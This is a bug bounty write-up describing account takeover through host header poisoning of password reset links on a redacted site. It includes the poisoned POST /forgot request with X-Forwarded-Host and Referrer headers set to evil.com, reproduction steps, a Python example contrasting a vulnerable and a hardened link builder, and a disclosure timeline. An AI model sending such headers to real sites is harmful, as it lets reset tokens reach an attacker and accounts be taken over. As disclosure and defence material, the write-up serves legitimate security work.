ATO via Host Header Poisoning

Hello Everyone (Ram Ram Ji),

This article is about an account takeover bug via host header poisoning. Redacted.com was vulnerable to host header injection, which a remote attacker could exploit to take over any account on redacted.com.

Attacking Scenario:

As an attacker, I modified the POST request: first I changed the value of the Host header to evil.com, but nothing happened; then I added the X-Forwarded-Host header with the value evil.com, and again nothing happened. On my third attempt, I also changed the value of the Referrer header and set it to the same value as the X-Forwarded-Host header, and it worked for me.

The request looked like this:

POST /forgot HTTP/1.1
Host: redacted.com
X-Forwarded-Host: evil.com
Referrer: https://evil.com

username=<username>&_csrf_token=5905477eb5efbc742cb051b922df433a775ae92e

[Image: the modified request as sent]

After sending the request, I received a password reset email with the host set to evil.com. It looked like this:

[Image: reset email containing the malicious host]

Steps to Reproduce (according to the report):

  1. Navigate to https://redacted.com/forgot.
  2. Enter your username and intercept the resulting request with Burp Suite.
  3. Add these two headers to the POST request:

X-Forwarded-Host: evil.com
Referrer: https://evil.com

  4. Forward the request and check the email address linked to your username.
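
The root cause behind these steps is a reset-link builder that trusts client-controlled headers. The following is an added example, not redacted.com's code: it shows such a builder next to a hardened version that pins the link to a configured canonical host and rejects unexpected Host values, plus a small check a mail pipeline could use to flag poisoned links. The canonical host, allow-list and token are assumptions; it does not model whatever Referrer check the target applied.

```python
# Added example: reset-link poisoning via forwarded host headers, and the fix.
# Constructed code for illustration, not the target application's own.
from urllib.parse import urlsplit, urlunsplit

# Assumed operator configuration: the only host reset links may point to.
CANONICAL_HOST = "redacted.com"
ALLOWED_HOSTS = {CANONICAL_HOST}


def reset_link_vulnerable(headers, token):
    """Builds the link from request headers (the bug described on this page).

    X-Forwarded-Host is honoured before Host, and both are client-supplied
    unless a trusted proxy strips and resets them."""
    host = headers.get("X-Forwarded-Host") or headers.get("Host")
    return urlunsplit(("https", host, "/reset", f"token={token}", ""))


def reset_link_hardened(headers, token):
    """Never derives the link host from the request.

    Host is only validated against the allow-list so that a poisoned
    request is rejected (and can be logged) rather than silently served."""
    host = headers.get("Host", "")
    if host.split(":")[0].lower() not in ALLOWED_HOSTS:
        raise ValueError(f"unexpected Host header: {host!r}")
    return urlunsplit(("https", CANONICAL_HOST, "/reset", f"token={token}", ""))


def is_poisoned(link):
    """Outbound-mail check: does the reset link leave our own domain?"""
    return urlsplit(link).hostname not in ALLOWED_HOSTS


# Constructed headers mirroring the POST /forgot request from the report.
ATTACK_HEADERS = {
    "Host": "redacted.com",
    "X-Forwarded-Host": "evil.com",
    "Referrer": "https://evil.com",
}
TOKEN = "exampletoken"  # placeholder value, not a real reset token

if __name__ == "__main__":
    bad = reset_link_vulnerable(ATTACK_HEADERS, TOKEN)
    good = reset_link_hardened(ATTACK_HEADERS, TOKEN)
    print("vulnerable:", bad, "-> poisoned" if is_poisoned(bad) else "-> ok")
    print("hardened:  ", good, "-> poisoned" if is_poisoned(good) else "-> ok")
```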

Timeline:

Bounty Rewarded

June 26, 2019 — Reported to private program
August 01, 2019 — Report Triaged
August 08, 2019 — Bounty of $2000 USD awarded
October 24, 2019 — Vulnerability fixed

Special thanks to nullr3x (Big Bad Brother 🤑 )

"CS-Engineer" | "Bughunter • Hackerone • Bugcrowd (Top 150)" | "Synack Red Teamer" • @sechunt3r

Shivam Kamboj Dattana